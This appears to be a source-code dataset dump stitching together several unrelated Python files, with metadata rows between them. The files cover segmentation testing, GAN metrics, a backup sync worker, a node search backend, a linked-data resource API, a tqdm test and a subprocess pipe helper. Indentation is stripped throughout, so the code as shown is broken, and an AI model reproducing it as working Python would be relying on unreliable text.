group.add_argument('--gt_column', type=int, default=11, help='(starting) column of label in gt (1-index)')
parser = argparse.ArgumentParser(description='Testing trained semantic segmentation network',
parents=[parser], formatter_class=argparse.ArgumentDefaultsHelpFormatter)
args = parser.parse_args()
network, weights = args.network, args.weights
save_dir, save_prefix = args.save_dir, args.save_prefix
log_train = args.log
log_eval = args.log_eval
if args.exp_dir is not None:
if args.exp_prefix:
exp_prefix = args.exp_prefix + '_'
snapshot_prefix = exp_prefix
else:
exp_prefix = ''
snapshot_prefix = 'snapshot_'
if network is None:
network = os.path.join(args.exp_dir, exp_prefix + 'net_deploy.prototxt')
if weights is None:
last_iter = max([int(os.path.split(v)[1].split('_')[-1][:-11]) for v in
glob.glob(os.path.join(args.exp_dir, snapshot_prefix + 'iter_*.caffemodel'))])
weights = os.path.join(args.exp_dir, '{}iter_{}.caffemodel'.format(snapshot_prefix, last_iter))
if log_train is None:
log_train = os.path.join(args.exp_dir, exp_prefix + 'train.log')
if not os.path.exists(log_train):
log_train = ''
if save_dir is None:
save_dir = args.exp_dir
if save_prefix is None:
save_prefix = exp_prefix
if log_eval is None:
log_eval = os.path.join(args.exp_dir, exp_prefix + 'test.log')
if not args.dataset_params:
args.dataset_params = {}
else:
args.dataset_params = dict(zip(args.dataset_params[::2], args.dataset_params[1::2]))
pred_path, elapsed, num_pts = semseg_test(args.dataset, network, weights, args.input, args.sample_size,
args.dataset_params, save_dir, save_prefix, args.cpu)
if log_eval:
with open(log_eval, 'a') as f:
f.write('Predictions saved to {}.\n'.format(pred_path))
f.write('{} points evaluated in {:.2f} secs.\n'.format(num_pts, elapsed))
if args.gt is not None:
import subprocess
subprocess.run('python {} --dataset {} {}'
'{} --pred_rgb --pred_column 7 '
'{} {}--gt_column {}'.format(EVAL_SCRIPT_PATH,
args.dataset,
'--log {} '.format(log_eval) if log_eval else '',
os.path.abspath(pred_path),
os.path.abspath(args.gt),
'--gt_rgb ' if args.gt_rgb else '',
args.gt_column).split(' '))
if log_train:
plot_log.parse_and_plot(log_train)
| 41.995708 | 120 | 0.626265 | 1,352 | 9,785 | 4.328402 | 0.195266 | 0.044429 | 0.043746 | 0.024607 | 0.238893 | 0.178913 | 0.145079 | 0.126282 | 0.078606 | 0.064252 | 0 | 0.010211 | 0.249361 | 9,785 | 232 | 121 | 42.176724 | 0.786521 | 0.07256 | 0 | 0.171271 | 0 | 0 | 0.179931 | 0 | 0 | 0 | 0 | 0.00431 | 0.005525 | 1 | 0.01105 | false | 0.005525 | 0.066298 | 0 | 0.088398 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c432e6abf57e89ba6b4e43e6f68aa1e3b62483 | 3,284 | py | Python | lib/metrics.py | nobodykid/dcgan_code | be7ddca6abd34cb5436b8304bf956cff8c40f3f2 | [
"MIT"
] | null | null | null | lib/metrics.py | nobodykid/dcgan_code | be7ddca6abd34cb5436b8304bf956cff8c40f3f2 | [
"MIT"
] | null | null | null | lib/metrics.py | nobodykid/dcgan_code | be7ddca6abd34cb5436b8304bf956cff8c40f3f2 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import theano
import theano.tensor as T
import gc
import time
from theano_utils import floatX
from ops import euclidean, cosine
from sklearn import metrics
from sklearn.linear_model import LogisticRegression as LR
def cv_reg_lr(trX, trY, vaX, vaY, Cs=[0.01, 0.05, 0.1, 0.5, 1., 5., 10., 50., 100.]):
tr_accs = []
va_accs = []
models = []
for C in Cs:
model = LR(C=C)
model.fit(trX, trY)
tr_pred = model.predict(trX)
va_pred = model.predict(vaX)
tr_acc = metrics.accuracy_score(trY, tr_pred)
va_acc = metrics.accuracy_score(vaY, va_pred)
print('%.4f %.4f %.4f'%(C, tr_acc, va_acc))
tr_accs.append(tr_acc)
va_accs.append(va_acc)
models.append(model)
best = np.argmax(va_accs)
print('best model C: %.4f tr_acc: %.4f va_acc: %.4f'%(Cs[best], tr_accs[best], va_accs[best]))
return models[best]
def gpu_nnc_predict(trX, trY, teX, metric='cosine', batch_size=4096):
if metric == 'cosine':
metric_fn = cosine_dist
else:
metric_fn = euclid_dist
idxs = []
for i in range(0, len(teX), batch_size):
mb_dists = []
mb_idxs = []
for j in range(0, len(trX), batch_size):
dist = metric_fn(floatX(teX[i:i+batch_size]), floatX(trX[j:j+batch_size]))
if metric == 'cosine':
mb_dists.append(np.max(dist, axis=1))
mb_idxs.append(j+np.argmax(dist, axis=1))
else:
mb_dists.append(np.min(dist, axis=1))
mb_idxs.append(j+np.argmin(dist, axis=1))
mb_idxs = np.asarray(mb_idxs)
mb_dists = np.asarray(mb_dists)
if metric == 'cosine':
i = mb_idxs[np.argmax(mb_dists, axis=0), np.arange(mb_idxs.shape[1])]
else:
i = mb_idxs[np.argmin(mb_dists, axis=0), np.arange(mb_idxs.shape[1])]
idxs.append(i)
idxs = np.concatenate(idxs, axis=0)
nearest = trY[idxs]
return nearest
def gpu_nnd_score(trX, teX, metric='cosine', batch_size=4096):
if metric == 'cosine':
metric_fn = cosine_dist
else:
metric_fn = euclid_dist
dists = []
for i in range(0, len(teX), batch_size):
mb_dists = []
for j in range(0, len(trX), batch_size):
dist = metric_fn(floatX(teX[i:i+batch_size]), floatX(trX[j:j+batch_size]))
if metric == 'cosine':
mb_dists.append(np.max(dist, axis=1))
else:
mb_dists.append(np.min(dist, axis=1))
mb_dists = np.asarray(mb_dists)
if metric == 'cosine':
d = np.max(mb_dists, axis=0)
else:
d = np.min(mb_dists, axis=0)
dists.append(d)
dists = np.concatenate(dists, axis=0)
return float(np.mean(dists))
A = T.matrix()
B = T.matrix()
ed = euclidean(A, B)
cd = cosine(A, B)
cosine_dist = theano.function([A, B], cd)
euclid_dist = theano.function([A, B], ed)
def nnc_score(trX, trY, teX, teY, metric='euclidean'):
pred = gpu_nnc_predict(trX, trY, teX, metric=metric)
acc = metrics.accuracy_score(teY, pred)
return acc*100.
def nnd_score(trX, teX, metric='euclidean'):
return gpu_nnd_score(trX, teX, metric=metric)
| 32.84 | 98 | 0.592266 | 502 | 3,284 | 3.713147 | 0.193227 | 0.052575 | 0.045064 | 0.023605 | 0.466738 | 0.426502 | 0.406652 | 0.381438 | 0.366416 | 0.32779 | 0 | 0.0225 | 0.269184 | 3,284 | 99 | 99 | 33.171717 | 0.754167 | 0 | 0 | 0.337079 | 0 | 0 | 0.037759 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05618 | false | 0 | 0.11236 | 0.011236 | 0.224719 | 0.022472 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c5726cbf6c5c23694fc1846d272d5090d75571 | 1,130 | py | Python | hassio-google-drive-backup/backup/model/syncer.py | voxipbx/hassio-addons | ddf2f1745f4240c2905f9f9d7616a927fb8934e4 | [
"MIT"
] | 1 | 2022-01-22T18:27:04.000Z | 2022-01-22T18:27:04.000Z | hassio-google-drive-backup/backup/model/syncer.py | voxipbx/hassio-addons | ddf2f1745f4240c2905f9f9d7616a927fb8934e4 | [
"MIT"
] | 19 | 2021-09-29T06:13:25.000Z | 2022-03-08T06:13:49.000Z | hassio-google-drive-backup/backup/model/syncer.py | voxipbx/hassio-addons | ddf2f1745f4240c2905f9f9d7616a927fb8934e4 | [
"MIT"
] | 1 | 2021-12-12T19:31:05.000Z | 2021-12-12T19:31:05.000Z | from typing import List
from injector import inject, singleton
from .coordinator import Coordinator
from backup.time import Time
from backup.worker import Worker, Trigger
from backup.logger import getLogger
from backup.exceptions import PleaseWait
logger = getLogger(__name__)
@singleton
class Scyncer(Worker):
@inject
def __init__(self, time: Time, coord: Coordinator, triggers: List[Trigger]):
super().__init__("Sync Worker", self.checkforSync, time, 0.5)
self.coord = coord
self.triggers: List[Trigger] = triggers
self._time = time
async def checkforSync(self):
try:
doSync = False
for trigger in self.triggers:
if trigger.check():
logger.debug("Sync requested by " + str(trigger.name()))
doSync = True
if doSync:
while self.coord.isSyncing():
await self._time.sleepAsync(3)
await self.coord.sync()
except PleaseWait:
# Ignore this, since it means a sync already started (race condition)
pass
| 30.540541 | 81 | 0.621239 | 126 | 1,130 | 5.460317 | 0.468254 | 0.05814 | 0.034884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003793 | 0.3 | 1,130 | 36 | 82 | 31.388889 | 0.865992 | 0.059292 | 0 | 0 | 0 | 0 | 0.027333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0.034483 | 0.241379 | 0 | 0.310345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c684ce31863da0ee17c3411588cb6b1aa624c4 | 6,832 | py | Python | momo/plugins/flask/search.py | shichao-an/momo | 9996bc22b1d99d379633e18e94f4815e12435898 | [
"BSD-2-Clause"
] | 6 | 2018-06-08T18:49:10.000Z | 2020-09-29T23:54:38.000Z | momo/plugins/flask/search.py | shichao-an/momo | 9996bc22b1d99d379633e18e94f4815e12435898 | [
"BSD-2-Clause"
] | 3 | 2016-08-13T02:15:04.000Z | 2016-11-02T00:05:40.000Z | momo/plugins/flask/search.py | shichao-an/momo | 9996bc22b1d99d379633e18e94f4815e12435898 | [
"BSD-2-Clause"
] | 2 | 2018-06-08T18:49:12.000Z | 2018-08-07T07:17:26.000Z | # search backend
from momo.core import Node
from momo.plugins.flask.filters import get_attr
from momo.plugins.flask.utils import str_to_bool, split_by
from momo.utils import txt_type, bin_type
class SearchError(Exception):
pass
def join_terms(*args):
res = []
for arg in args:
res.append(arg.strip('/'))
return '/'.join(res)
def parse_q(s):
"""Parse the value of query string q (?q=) into a search sub-term."""
if '=' not in s:
names = s.split()
term = '/'.join(map(lambda x: 'n.name=' + x, names))
return term
else:
subterms = s.split()
res = []
for subterm in subterms:
if '=' not in subterm:
res.append('n.name=' + subterm)
else:
res.append(subterm)
term = '&'.join(res)
return term
def search_nodes_by_term(term, root, case_insensitive, sep):
"""
High-level function to search nodes by search term. It does three things:
1. Parse the search term into a list of lambda lists.
2. Generate a search filter function.
3. Search the nodes with the search filter function.
"""
parsed_term = parse_search_term(term, case_insensitive, sep)
search_filter = get_search_filter(parsed_term)
nodes = search_nodes(root, search_filter)
return nodes
def parse_search_term(term, case_insensitive=False, sep=None):
"""
Parse a search term and returns a list of lambdas lists.
A search term is a path-like string seperated by slash (/). The slashes
"AND" these path components together, meaning the results are those which
satisfy all of them. Each component also comprises some sub-terms, in the
form of "key1=value1&key2=value2", with each key having an optional
prefix, which can be "n[x_]." (a node object's attribute) or "a[x]." (an
attr name); the optional "x" suffix indicates whether to perform an exact
match and "_" suffix indicates that to match nodes without this node
object attribute or attr. Note that although the sub-terms are seperated
by ampersand (&), they are "OR"ed together, meaning the results are those
satisfy any of them.
"""
res = []
entities = term.split('/')
for entity in entities:
subterms = filter(lambda x: x.strip(), entity.split('&'))
lambdas = []
for subterm in subterms:
key, s = subterm.split('=')
if '.' in key:
prefix, name = key.split('.', 1)
if prefix in ('a', 'ax', 'a_'):
lambdas.append(
lambda node, name=name, s=s, prefix=prefix:
match_value(
value=get_attr(node, name),
s=s,
exact=prefix == 'ax',
without=prefix == 'a_',
case_insensitive=case_insensitive,
sep=sep,
)
)
elif prefix in ('n', 'nx', 'n_'):
lambdas.append(
lambda node, name=name, s=s, prefix=prefix:
match_value(
value=getattr(node, name, None),
s=s,
exact=prefix == 'nx',
without=prefix == 'n_',
case_insensitive=case_insensitive,
sep=sep,
)
)
else:
raise SearchError('unknown prefix {}'.format(prefix))
else:
raise SearchError('no prefix specified')
if lambdas:
res.append(lambdas)
return res
def match_value(value, s, exact=False, without=False, case_insensitive=False,
sep=None):
"""
Test whether the value of a node attribute or attr content matches the
given string s, which is retrieved from parsed term.
:param value: value of a node attribute or attr content.
:param s: a string.
:param exact: whether to do exact matches.
:param without: if True, match if value is None (meaning value does not
exist in the node).
:param case_insensitive: whether do case-insensitive matching.
:param sep: if not None, the separator is used to treat a string as a list
separated by this separator.
"""
def with_case(a):
if case_insensitive:
return a.lower()
else:
return a
def match_list(s, values):
txt_values = map(with_case, map(txt_type, values))
if exact:
return with_case(s) in txt_values
else:
for txt_value in txt_values:
if with_case(s) in with_case(txt_value):
return True
return False
if value is None:
if without:
return True
else:
return False
else:
if without:
return False
s = txt_type(s)
if isinstance(value, (txt_type, bin_type, bool, int, float, Node)):
if isinstance(value, bool):
return match_bool(value, s)
else:
if (sep is not None and
isinstance(value, (txt_type, bin_type)) and
sep in value):
values = split_by(value, sep)
return match_list(s, values)
else:
if isinstance(value, Node):
value = value.name
if exact:
return with_case(txt_type(value)) == with_case(s)
else:
return with_case(s) in with_case(txt_type(value))
else:
return match_list(s, value)
def match_bool(value, s):
"""
Test whether a boolean value matches the given string s.
"""
return value == str_to_bool(s)
def get_search_filter(lambda_lists):
"""Generate a search filter based on the lambda lists."""
def search_filter(node):
"""Evaluate node and reduce lambda_lists."""
evaluated_list = [
reduce(lambda x, y: x or y, map(lambda x: x(node), lambda_list))
for lambda_list in lambda_lists
]
return reduce(lambda x, y: x and y, evaluated_list)
return search_filter
def search_nodes(root, func=lambda x: True):
"""
Search nodes from the root in a BFS manner.
:param root: the root node.
:param func: a filtering function.
"""
nodes = []
queue = [root]
while queue:
cur_node = queue.pop(0)
for node in cur_node.node_vals:
if func(node):
nodes.append(node)
queue.append(node)
return nodes
| 32.688995 | 78 | 0.55079 | 849 | 6,832 | 4.3298 | 0.217903 | 0.044886 | 0.019587 | 0.011425 | 0.185256 | 0.134929 | 0.063112 | 0.051143 | 0.032644 | 0.032644 | 0 | 0.002062 | 0.361095 | 6,832 | 208 | 79 | 32.846154 | 0.840092 | 0.265954 | 0 | 0.311111 | 0 | 0 | 0.01637 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081481 | false | 0.007407 | 0.02963 | 0 | 0.281481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c7b4e8d153e9a166fd23f1d8c092f1c7442e90 | 10,877 | py | Python | lakesuperior/api/resource.py | barmintor/lakesuperior | a1e534a56cf762e55273d2421edf5e4948c3159b | [
"Apache-2.0"
] | null | null | null | lakesuperior/api/resource.py | barmintor/lakesuperior | a1e534a56cf762e55273d2421edf5e4948c3159b | [
"Apache-2.0"
] | null | null | null | lakesuperior/api/resource.py | barmintor/lakesuperior | a1e534a56cf762e55273d2421edf5e4948c3159b | [
"Apache-2.0"
] | null | null | null | import logging
from functools import wraps
from itertools import groupby
from multiprocessing import Process
from threading import Lock, Thread
import arrow
from rdflib import Graph, Literal, URIRef
from rdflib.namespace import XSD
from lakesuperior.config_parser import config
from lakesuperior.exceptions import (
InvalidResourceError, ResourceNotExistsError, TombstoneError)
from lakesuperior.env import env
from lakesuperior.globals import RES_DELETED, RES_UPDATED
from lakesuperior.model.ldp_factory import LDP_NR_TYPE, LdpFactory
from lakesuperior.store.ldp_rs.lmdb_store import TxnManager
logger = logging.getLogger(__name__)
__doc__ = """
Primary API for resource manipulation.
Quickstart:
>>> # First import default configuration and globals—only done once.
>>> import lakesuperior.default_env
>>> from lakesuperior.api import resource
>>> # Get root resource.
>>> rsrc = resource.get('/')
>>> # Dump graph.
>>> set(rsrc.imr)
{(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://purl.org/dc/terms/title'),
rdflib.term.Literal('Repository Root')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/v4/repository#Container')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/v4/repository#RepositoryRoot')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/v4/repository#Resource')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#BasicContainer')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#Container')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#RDFSource'))}
"""
def transaction(write=False):
"""
Handle atomic operations in a store.
This wrapper ensures that a write operation is performed atomically. It
also takes care of sending a message for each resource changed in the
transaction.
ALL write operations on the LDP-RS and LDP-NR stores go through this
wrapper.
"""
def _transaction_deco(fn):
@wraps(fn)
def _wrapper(*args, **kwargs):
# Mark transaction begin timestamp. This is used for create and
# update timestamps on resources.
env.timestamp = arrow.utcnow()
env.timestamp_term = Literal(env.timestamp, datatype=XSD.dateTime)
with TxnManager(env.app_globals.rdf_store, write=write) as txn:
ret = fn(*args, **kwargs)
if len(env.app_globals.changelog):
job = Thread(target=_process_queue)
job.start()
delattr(env, 'timestamp')
delattr(env, 'timestamp_term')
return ret
return _wrapper
return _transaction_deco
def _process_queue():
"""
Process the message queue on a separate thread.
"""
lock = Lock()
lock.acquire()
while len(env.app_globals.changelog):
_send_event_msg(*env.app_globals.changelog.popleft())
lock.release()
def _send_event_msg(remove_trp, add_trp, metadata):
"""
Send messages about a changed LDPR.
A single LDPR message packet can contain multiple resource subjects, e.g.
if the resource graph contains hash URIs or even other subjects. This
method groups triples by subject and sends a message for each of the
subjects found.
"""
# Group delta triples by subject.
remove_grp = groupby(remove_trp, lambda x : x[0])
remove_dict = {k[0]: k[1] for k in remove_grp}
add_grp = groupby(add_trp, lambda x : x[0])
add_dict = {k[0]: k[1] for k in add_grp}
subjects = set(remove_dict.keys()) | set(add_dict.keys())
for rsrc_uri in subjects:
logger.debug('Processing event for subject: {}'.format(rsrc_uri))
env.app_globals.messenger.send(rsrc_uri, **metadata)
### API METHODS ###
@transaction()
def exists(uid):
"""
Return whether a resource exists (is stored) in the repository.
:param string uid: Resource UID.
"""
try:
exists = LdpFactory.from_stored(uid).is_stored
except ResourceNotExistsError:
exists = False
return exists
@transaction()
def get_metadata(uid):
"""
Get metadata (admin triples) of an LDPR resource.
:param string uid: Resource UID.
"""
return LdpFactory.from_stored(uid).metadata
@transaction()
def get(uid, repr_options={}):
"""
Get an LDPR resource.
The resource comes preloaded with user data and metadata as indicated by
the `repr_options` argument. Any further handling of this resource is done
outside of a transaction.
:param string uid: Resource UID.
:param repr_options: (dict(bool)) Representation options. This is a dict
that is unpacked downstream in the process. The default empty dict
results in default values. The accepted dict keys are:
- incl_inbound: include inbound references. Default: False.
- incl_children: include children URIs. Default: True.
- embed_children: Embed full graph of all child resources. Default: False
"""
rsrc = LdpFactory.from_stored(uid, repr_options)
# Load graph before leaving the transaction.
rsrc.imr
return rsrc
@transaction()
def get_version_info(uid):
"""
Get version metadata (fcr:versions).
"""
return LdpFactory.from_stored(uid).version_info
@transaction()
def get_version(uid, ver_uid):
"""
Get version metadata (fcr:versions).
"""
return LdpFactory.from_stored(uid).get_version(ver_uid)
@transaction(True)
def create(parent, slug, **kwargs):
r"""
Mint a new UID and create a resource.
The UID is computed from a given parent UID and a "slug", a proposed path
relative to the parent. The application will attempt to use the suggested
path but it may use a different one if a conflict with an existing resource
arises.
:param str parent: UID of the parent resource.
:param str slug: Tentative path relative to the parent UID.
:param \*\*kwargs: Other parameters are passed to the
:py:meth:`~lakesuperior.model.ldp_factory.LdpFactory.from_provided`
method.
:rtype: str
:return: UID of the new resource.
"""
uid = LdpFactory.mint_uid(parent, slug)
logger.debug('Minted UID for new resource: {}'.format(uid))
rsrc = LdpFactory.from_provided(uid, **kwargs)
rsrc.create_or_replace(create_only=True)
return uid
@transaction(True)
def create_or_replace(uid, **kwargs):
r"""
Create or replace a resource with a specified UID.
:param string uid: UID of the resource to be created or updated.
:param \*\*kwargs: Other parameters are passed to the
:py:meth:`~lakesuperior.model.ldp_factory.LdpFactory.from_provided`
method.
:rtype: str
:return: Event type: whether the resource was created or updated.
"""
return LdpFactory.from_provided(uid, **kwargs).create_or_replace()
@transaction(True)
def update(uid, update_str, is_metadata=False):
"""
Update a resource with a SPARQL-Update string.
:param string uid: Resource UID.
:param string update_str: SPARQL-Update statements.
:param bool is_metadata: Whether the resource metadata are being updated.
:raise InvalidResourceError: If ``is_metadata`` is False and the resource
being updated is a LDP-NR.
"""
# FCREPO is lenient here and Hyrax requires it.
rsrc = LdpFactory.from_stored(uid, handling='lenient')
if LDP_NR_TYPE in rsrc.ldp_types and not is_metadata:
raise InvalidResourceError(
'Cannot use this method to update an LDP-NR content.')
delta = rsrc.sparql_delta(update_str)
rsrc.modify(RES_UPDATED, *delta)
return rsrc
@transaction(True)
def update_delta(uid, remove_trp, add_trp):
"""
Update a resource graph (LDP-RS or LDP-NR) with sets of add/remove triples.
A set of triples to add and/or a set of triples to remove may be provided.
:param string uid: Resource UID.
:param set(tuple(rdflib.term.Identifier)) remove_trp: Triples to
remove, as 3-tuples of RDFLib terms.
:param set(tuple(rdflib.term.Identifier)) add_trp: Triples to
add, as 3-tuples of RDFLib terms.
"""
rsrc = LdpFactory.from_stored(uid)
remove_trp = rsrc.check_mgd_terms(remove_trp)
add_trp = rsrc.check_mgd_terms(add_trp)
return rsrc.modify(RES_UPDATED, remove_trp, add_trp)
@transaction(True)
def create_version(uid, ver_uid):
"""
Create a resource version.
:param string uid: Resource UID.
:param string ver_uid: Version UID to be appended to the resource URI.
NOTE: this is a "slug", i.e. the version URI is not guaranteed to be the
one indicated.
:rtype: str
:return: Version UID.
"""
return LdpFactory.from_stored(uid).create_version(ver_uid)
@transaction(True)
def delete(uid, soft=True):
"""
Delete a resource.
:param string uid: Resource UID.
:param bool soft: Whether to perform a soft-delete and leave a
tombstone resource, or wipe any memory of the resource.
"""
# If referential integrity is enforced, grab all inbound relationships
# to break them.
refint = env.app_globals.rdfly.config['referential_integrity']
inbound = True if refint else inbound
repr_opts = {'incl_inbound' : True} if refint else {}
children = env.app_globals.rdfly.get_descendants(uid)
if soft:
rsrc = LdpFactory.from_stored(uid, repr_opts)
ret = rsrc.bury_rsrc(inbound)
for child_uri in children:
try:
child_rsrc = LdpFactory.from_stored(
env.app_globals.rdfly.uri_to_uid(child_uri),
repr_opts={'incl_children' : False})
except (TombstoneError, ResourceNotExistsError):
continue
child_rsrc.bury_rsrc(inbound, tstone_pointer=rsrc.uri)
else:
ret = env.app_globals.rdfly.forget_rsrc(uid, inbound)
for child_uri in children:
child_uid = env.app_globals.rdfly.uri_to_uid(child_uri)
ret = env.app_globals.rdfly.forget_rsrc(child_uid, inbound)
return ret
@transaction(True)
def resurrect(uid):
"""
Reinstate a buried (soft-deleted) resource.
:param str uid: Resource UID.
"""
return LdpFactory.from_stored(uid).resurrect_rsrc()
| 32.085546 | 85 | 0.689069 | 1,490 | 10,877 | 4.922819 | 0.227517 | 0.031357 | 0.043626 | 0.035446 | 0.312065 | 0.256169 | 0.197001 | 0.178732 | 0.16319 | 0.147785 | 0 | 0.007866 | 0.205204 | 10,877 | 338 | 86 | 32.180473 | 0.840486 | 0.357268 | 0 | 0.205128 | 0 | 0.038462 | 0.262698 | 0.049409 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108974 | false | 0 | 0.108974 | 0 | 0.314103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ca34a36e384eb81002bc0dd5ef92f09e6cd1e3 | 1,212 | py | Python | src/data/download/utils/test_tqdm.py | lcn-kul/conferencing-speech-2022 | 1089b2baaf2fcf3ac8ef44c65b80da2e5b2c331b | [
"MIT"
] | 1 | 2022-03-30T15:06:18.000Z | 2022-03-30T15:06:18.000Z | src/data/download/utils/test_tqdm.py | lcn-kul/conferencing-speech-2022 | 1089b2baaf2fcf3ac8ef44c65b80da2e5b2c331b | [
"MIT"
] | null | null | null | src/data/download/utils/test_tqdm.py | lcn-kul/conferencing-speech-2022 | 1089b2baaf2fcf3ac8ef44c65b80da2e5b2c331b | [
"MIT"
] | null | null | null | import time
from tqdm import tqdm
from src.data.download.utils.tqdm_write import (
tqdm_print,
tqdm_printer,
tqdm_run_parallel,
)
def func0(tqdm_name, tqdm_idx):
N = 100
with tqdm(desc=tqdm_name, total=N, position=tqdm_idx, leave=False) as pbar:
for i in range(N):
pbar.update()
time.sleep(0.05)
tqdm_print("done", tqdm_name, tqdm_idx)
def func1(tqdm_name, tqdm_idx):
N = 200
with tqdm(desc=tqdm_name, total=N, position=tqdm_idx, leave=False) as pbar:
for i in range(N):
pbar.update()
time.sleep(0.05)
tqdm_print("done", tqdm_name, tqdm_idx)
def func2(tqdm_name, tqdm_idx):
N = 600
with tqdm(desc=tqdm_name, total=N, position=tqdm_idx, leave=False) as pbar:
for i in range(N):
pbar.update()
time.sleep(0.02)
tqdm_print("done", tqdm_name, tqdm_idx)
def test_tqdm():
funcs = [func0, func1, func2]
args = [tuple() for _ in funcs]
names = ["func0", "func1", "func2"]
print("Testing tqdm...")
time.sleep(1)
with tqdm_printer(3):
tqdm_run_parallel(funcs, args, names)
print("done")
if __name__ == "__main__":
test_tqdm()
| 22.867925 | 79 | 0.617162 | 180 | 1,212 | 3.933333 | 0.283333 | 0.101695 | 0.101695 | 0.127119 | 0.581921 | 0.514124 | 0.514124 | 0.514124 | 0.470339 | 0.470339 | 0 | 0.032151 | 0.255776 | 1,212 | 52 | 80 | 23.307692 | 0.752772 | 0 | 0 | 0.358974 | 0 | 0 | 0.044554 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102564 | false | 0 | 0.076923 | 0 | 0.179487 | 0.205128 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ca661d82b5269b0a8ebb7b120cf2934c9a705f | 515 | py | Python | src/package_controller/library/utils/pipe_commands.py | alexseitsinger/package_controller | 0ee896986cfa17a96bf9fb6afff35dd97f0b1211 | [
"BSD-2-Clause"
] | 2 | 2020-11-24T14:16:38.000Z | 2021-03-16T19:29:45.000Z | src/package_controller/library/utils/pipe_commands.py | alexseitsinger/package_controller | 0ee896986cfa17a96bf9fb6afff35dd97f0b1211 | [
"BSD-2-Clause"
] | 2 | 2020-11-25T01:00:45.000Z | 2020-11-25T01:59:58.000Z | src/package_controller/library/utils/pipe_commands.py | alexseitsinger/package_controller | 0ee896986cfa17a96bf9fb6afff35dd97f0b1211 | [
"BSD-2-Clause"
] | null | null | null | from subprocess import Popen, PIPE
import shlex
def pipe_commands(commands):
first_proc = None
last_proc = None
for command in commands:
args = shlex.split(command)
if first_proc is None:
first_proc = last_proc = Popen(args, stdout=PIPE, stderr=PIPE)
else:
last_proc = Popen(args, stdin=last_proc.stdout, stdout=PIPE, stderr=PIPE)
first_proc.stdout.close()
out, err = last_proc.communicate()
decoded = out.decode("utf-8")
return decoded
| 28.611111 | 85 | 0.660194 | 69 | 515 | 4.782609 | 0.463768 | 0.121212 | 0.078788 | 0.10303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002584 | 0.248544 | 515 | 17 | 86 | 30.294118 | 0.850129 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.133333 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10cdb0831f3d47cf768cf2a8247cb721e4071727 | 1,946 | py | Python | fast_transformers/recurrent/attention/full_attention.py | jmercat/fast-transformers | 1061f2ffa09c6d74aa252389e47f76ae827b1064 | [
"MIT"
